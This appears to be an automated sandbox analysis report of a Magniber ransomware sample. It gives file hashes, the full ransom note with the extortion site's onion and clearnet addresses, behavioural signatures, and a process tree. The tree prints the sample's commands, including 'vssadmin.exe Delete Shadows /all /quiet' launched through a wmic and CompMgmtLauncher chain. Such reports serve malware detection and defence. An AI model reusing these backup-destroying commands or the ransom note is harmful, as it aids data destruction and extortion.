Overview

overview

10

Static

static

7.exe

windows7_x64

10

7.exe

windows10_x64

10

Analysis

  • max time kernel
    108s
  • max time network
    188s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    22-06-2021 15:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7.exe

  • Size

    21KB

  • MD5

    555aee36e8e1c0e684e658b9ef65bc83

  • SHA1

    f8afbddf6e6ab23f914f961b2eedc51f8b78fabd

  • SHA256

    9f72ed1dc20575f4e19a75256a0df8871561008ce1387e12d932598c21a5b16f

  • SHA512

    b65578a6c9ed2d9262776a73ebb230aa3deeb7e4aa829add17024609261c58dd9e941d6ebde5a6dcac824b56df8d7dccce4938d498069800cc63f14a05513b52

Score
10/10
magniberransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://f014ace070784a70eedezwvaw.ndkeblzjnpqgpo5o.onion/dezwvaw Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://f014ace070784a70eedezwvaw.lognear.xyz/dezwvaw http://f014ace070784a70eedezwvaw.wonride.site/dezwvaw http://f014ace070784a70eedezwvaw.lieedge.casa/dezwvaw http://f014ace070784a70eedezwvaw.bejoin.space/dezwvaw Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://f014ace070784a70eedezwvaw.ndkeblzjnpqgpo5o.onion/dezwvaw

http://f014ace070784a70eedezwvaw.lognear.xyz/dezwvaw

http://f014ace070784a70eedezwvaw.wonride.site/dezwvaw

http://f014ace070784a70eedezwvaw.lieedge.casa/dezwvaw

http://f014ace070784a70eedezwvaw.bejoin.space/dezwvaw

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Process spawned unexpected child process 8 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 15 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Suspicious use of SetThreadContext 4 IoCs
  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1196
    • C:\Windows\System32\afkys6.exe
      "C:\Windows\System32\afkys6.exe"
      2⤵
      • Modifies registry class
      • Suspicious use of UnmapMainImage
      • Suspicious use of WriteProcessMemory
      PID:1528
      • C:\Windows\System32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:892
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1332
    • C:\Users\Admin\AppData\Local\Temp\7.exe
      "C:\Users\Admin\AppData\Local\Temp\7.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1240
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1652
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1500
  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1172
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1848
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:552
  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    • Modifies extensions of user files
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1120
    • C:\Windows\system32\notepad.exe
      notepad.exe C:\Users\Public\readme.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:1716
    • C:\Windows\system32\cmd.exe
      cmd /c "start http://f014ace070784a70eedezwvaw.lognear.xyz/dezwvaw^&1^&50723516^&86^&381^&12"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1684
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://f014ace070784a70eedezwvaw.lognear.xyz/dezwvaw&1&50723516&86&381&12
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1648
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1648 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:608
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1680
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1016
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1240
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:800
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
          PID:2064
    • C:\Windows\system32\cmd.exe
      cmd /c CompMgmtLauncher.exe
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1168
      • C:\Windows\system32\CompMgmtLauncher.exe
        CompMgmtLauncher.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1624
        • C:\Windows\system32\wbem\wmic.exe
          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
          3⤵
            PID:2056
      • C:\Windows\system32\cmd.exe
        cmd /c CompMgmtLauncher.exe
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1696
        • C:\Windows\system32\CompMgmtLauncher.exe
          CompMgmtLauncher.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1872
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
            3⤵
              PID:2072
        • C:\Windows\system32\cmd.exe
          cmd /c CompMgmtLauncher.exe
          1⤵
          • Process spawned unexpected child process
          • Suspicious use of WriteProcessMemory
          PID:1068
          • C:\Windows\system32\CompMgmtLauncher.exe
            CompMgmtLauncher.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1644
            • C:\Windows\system32\wbem\wmic.exe
              "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
              3⤵
                PID:2084
          • C:\Windows\system32\vssadmin.exe
            vssadmin.exe Delete Shadows /all /quiet
            1⤵
            • Process spawned unexpected child process
            • Interacts with shadow copies
            PID:2260
          • C:\Windows\system32\vssvc.exe
            C:\Windows\system32\vssvc.exe
            1⤵
              PID:2328
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2348
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2372
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2432

            Network

            MITRE ATT&CK Enterprise v6

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\RJD9VUPE.txt
              MD5

              ee27c199cf5ed1ddb47ccfd35e806b55

              SHA1

              a7639f653eb8111a85d32ebaf81864e1a4b27424

              SHA256

              1c3176b3575a1aa2190657f8926a204f219dbb73f91e6ca655a32f724a4607b8

              SHA512

              7541d607fdd5cf285582e43d1b74c41429d0601c62bf8365fa1b8a29b5d9c3e181bce59929b026a679425220b22e2357980f3b961a7a9ee012ae091f43e5be90

              Download Submit

            • C:\Users\Admin\Desktop\ConvertFromResolve.bmp.dezwvaw
              MD5

              3750808b2a89029310864d30375cc2d0

              SHA1

              02303d7c4f2396e1733b4fcb9d8ecd691c74a521

              SHA256

              8f32053477d59aa6c1ba353190d711fe33971cc6e459cf87714da83ec2da1bea

              SHA512

              8c243e81fb9c396155726da2930346bcc2c1e1f9e81b378dae2f3967c785dff81f11c0964465e8a6bd67f7bf9ebc5ee9d5e12f0f27308cdea8048c8412bc4d15

              Download Submit

            • C:\Users\Admin\Desktop\GrantFormat.jpg.dezwvaw
              MD5

              eecc4d9b459520a91b3e73b23084d7eb

              SHA1

              e56517583f993b2e351efeae36534b88eef9dcc8

              SHA256

              73ec139ed38badf5d9194b0d8e387a54e10cfb72a8c6e82a8d2ba56de89b8591

              SHA512

              a005121b255a7a2a40f327a665a2d069bc1ccddd8a7667eade72582fe0eb43f751a064047d39a66e5b0b262801d7156455e15d8fea5d5289491df35d8a732420

              Download Submit

            • C:\Users\Admin\Desktop\ImportUnblock.wav.dezwvaw
              MD5

              756e06698b1d824c8b7a3b46354617e5

              SHA1

              6318cad282540e660eea957018569ce4e8c28ca7

              SHA256

              85337073869a7ba35175501b3be55a3556b2a7e3b8bc2f43e80e98ec97879b2f

              SHA512

              6aacbc21e37b83a894564275c378ea41f7a0133ce97d00b98fd2b33b8d28d5517bd8037a913ffb1b8b4871870ad5e7491a66b1a0a2768e0af93090cb3b980ecb

              Download Submit

            • C:\Users\Admin\Desktop\LimitAssert.tiff.dezwvaw
              MD5

              599869b86c651bda0de6cd1685a103a1

              SHA1

              c714fd18e8414aa6ad79d3e4cc1ea1a64b2c15fb

              SHA256

              b5f5d7ef34d7447a6bb96b27a42ebbbf85f816eff0bff327a93788be83fbabc2

              SHA512

              dc7bf36b6f58a8b34df9ab658c84325ee0a807fcea589c96effe07fe94d6643a995e9d22a450c22ac8b444838cc5d586092a093a065576680f004e1d4aadd364

              Download Submit

            • C:\Users\Admin\Desktop\MountStart.xps.dezwvaw
              MD5

              fbc5478c8d0a0b715ae2790da19045dd

              SHA1

              148775a40ea50487cb53f6079b77c813ad612531

              SHA256

              cfdf3fefe24fb18f7d34d22d2f3dfcbdc0db0a45630ad3ba339b2001810a2ddd

              SHA512

              bcf93d50db2f0b58131377d05c7ec35f02816604c3b2dd61074c0b6611a8d74bba527c0b0bfc1b2129b336d95527f23fc88c5987fbb11a5826b212836b732246

              Download Submit

            • C:\Users\Admin\Desktop\NewOptimize.vsd.dezwvaw
              MD5

              38f433fe96ef7ed2e17ffc2203780090

              SHA1

              8af7d7d76dcb7219759dfa6dd738d7fe6ae60336

              SHA256

              1c1ee5ce00d6e75bdc09d1975df5f272c57d492f5a7d209e826f62d2e4f57c03

              SHA512

              96b2eb59965882658b8335d94d5d9f11d59e6dcbfbfc01050aa07a632e5bbf16fbd1b5db4bcc68fe435bae65235512b01bde869bc243f71389519cb93fdf6fde

              Download Submit

            • C:\Users\Admin\Desktop\StartPublish.vstm.dezwvaw
              MD5

              da80fde4a7bea78ea195c1e381f9026f

              SHA1

              a2e130a6dfd8bab8aef4eee06d0e1b4c72458372

              SHA256

              7ce12b4a11bb324c868139d9b22fcdeab0461e5f567236d2dc77ec1ea64aa508

              SHA512

              a9bd59a7f7915109289cc0cbb33ff52f14e8e29dbfe74a14e7d7f495a72de78e7907aa44c53ba4a28ec8213e9c2db85f89312c5932931148956a36c9248dfed7

              Download Submit

            • C:\Users\Admin\Desktop\SuspendConnect.emf.dezwvaw
              MD5

              79401850836e7dee822fcdb5a811b501

              SHA1

              03e4682f8672c67c905d8284fa6433c3d1d2ea70

              SHA256

              74f25626d51f57a7069c0744d7db3dcab2a5a8c7b0337b4d583549d59f124ad4

              SHA512

              567b026d0438c8ccb6f93cfe46e6dabbbf4907049a712b4ee91f08be4295d84eff9fa1ae346c8c2a45a3fde8078020f90a80e0a707dd29778b1591f239b1630f

              Download Submit

            • C:\Users\Admin\Desktop\SwitchPublish.vb.dezwvaw
              MD5

              5a86e805d570e2878e49f40390250f2c

              SHA1

              14880632696f09f1161d367d569034716c47e5fa

              SHA256

              f2e30c4401ab5c530d753639ce1f0209a4d867bb481e23801b0484b31fb016d5

              SHA512

              fb798605f3f6314e61fb574ebe487dfd9033e2dc2446ec64cca0f7e9f2187568b785bb3604a3e7f538deb1c908f2365935501d33f645abeebc7648e8deb3e6ed

              Download Submit

            • C:\Users\Admin\Desktop\SyncStart.xlsx.dezwvaw
              MD5

              c64b72fafe2a24ee49632312ef99c3aa

              SHA1

              cf672a90e71853bfc10fece90b6c0297b772636e

              SHA256

              df6451975322e76fb698362052b428da61a63fb25309ff7f2f957311170a2118

              SHA512

              4f472a1f923899e07a247aa30ca0376c44f82ec315d60cde388c1bf9de50a47f3e0c7d8a89ab88d52793d5f84bc0434a988ae213b6f641772b03a48b0b8ffaf5

              Download Submit

            • C:\Users\Admin\Desktop\SyncTrace.zip.dezwvaw
              MD5

              c1e05c39196b64d782479dcb4dbd358e

              SHA1

              7461761ebc0b314c0985c86bed19c449c7c47dec

              SHA256

              5c99d5c737714f6a29168eff6383861c5affb6f38a131784650d78b1930dd1c6

              SHA512

              dffe30df4bd18145ad0b0ff9ad3687b89b0c3c165cce34d34eb86bc7e08bb44d0a268f8fd7e914cf99fc11829cac542741bf97281a52b4971bf399e43f85f2aa

              Download Submit

            • C:\Users\Admin\Desktop\UninstallFind.svg.dezwvaw
              MD5

              992311ecec376a23e8f90c203c4b35b1

              SHA1

              60d2add64815c71d375e16fe6724a31600a064d4

              SHA256

              870562aafca13ad1c8fb4538c2ad1ffaa33eb5a00811cfe89219152cabaf82d1

              SHA512

              a230e4c583f1eb1f6475a47bdfbc97e4371d3e3eabdea0e4bbb8fcc45e4d13fe17d1d57c4eb6197268e0ffb34e718b563624d228a614578679efa4924f976a62

              Download Submit

            • C:\Users\Admin\Desktop\readme.txt
              MD5

              a8a62fd6f235dd584f493ec731b643a3

              SHA1

              182227aaa4e92988b2412ce6dbd0297814370564

              SHA256

              0b85c287e0003589f5b1b1ec0b8874271c39c0542a9bcf0ece67f3f4241c02a3

              SHA512

              9c7be171d9eda0dd6866aa4510b33d939de33a406714536861f5b52fa7d7ce2c8c8b662d3a624808ba9d5924b1749051b541c87dae1533b5b7b3e0754d0a80fb

              Download Submit

            • C:\Users\Public\readme.txt
              MD5

              a8a62fd6f235dd584f493ec731b643a3

              SHA1

              182227aaa4e92988b2412ce6dbd0297814370564

              SHA256

              0b85c287e0003589f5b1b1ec0b8874271c39c0542a9bcf0ece67f3f4241c02a3

              SHA512

              9c7be171d9eda0dd6866aa4510b33d939de33a406714536861f5b52fa7d7ce2c8c8b662d3a624808ba9d5924b1749051b541c87dae1533b5b7b3e0754d0a80fb

              Download Submit

            • memory/552-89-0x0000000000000000-mapping.dmp

              Download

            • memory/608-102-0x0000000000000000-mapping.dmp

              Download

            • memory/800-99-0x0000000000000000-mapping.dmp

              Download

            • memory/892-90-0x0000000000000000-mapping.dmp

              Download

            • memory/1016-87-0x0000000000000000-mapping.dmp

              Download

            • memory/1240-60-0x0000000000020000-0x0000000000025000-memory.dmp

              Filesize

              20KB

              Download

            • memory/1240-62-0x00000000002F0000-0x00000000002F1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/1240-61-0x00000000002E0000-0x00000000002E1000-memory.dmp

              Filesize

              4KB

              Download

            • memory/1240-64-0x0000000000310000-0x0000000000311000-memory.dmp

              Filesize

              4KB

              Download

            • memory/1240-63-0x0000000000300000-0x0000000000301000-memory.dmp

              Filesize

              4KB

              Download

            • memory/1332-91-0x0000000000000000-mapping.dmp

              Download

            • memory/1500-93-0x0000000000000000-mapping.dmp

              Download

            • memory/1624-94-0x0000000000000000-mapping.dmp

              Download

            • memory/1644-96-0x0000000000000000-mapping.dmp

              Download

            • memory/1648-88-0x0000000000000000-mapping.dmp

              Download

            • memory/1652-92-0x0000000000000000-mapping.dmp

              Download

            • memory/1680-71-0x0000000000000000-mapping.dmp

              Download

            • memory/1684-70-0x0000000000000000-mapping.dmp

              Download

            • memory/1716-66-0x0000000000000000-mapping.dmp

              Download

            • memory/1716-68-0x000007FEFC391000-0x000007FEFC393000-memory.dmp

              Filesize

              8KB

              Download

            • memory/1848-86-0x0000000000000000-mapping.dmp

              Download

            • memory/1872-95-0x0000000000000000-mapping.dmp

              Download

            • memory/2056-106-0x0000000000000000-mapping.dmp

              Download

            • memory/2064-105-0x0000000000000000-mapping.dmp

              Download

            • memory/2072-103-0x0000000000000000-mapping.dmp

              Download

            • memory/2084-104-0x0000000000000000-mapping.dmp

              Download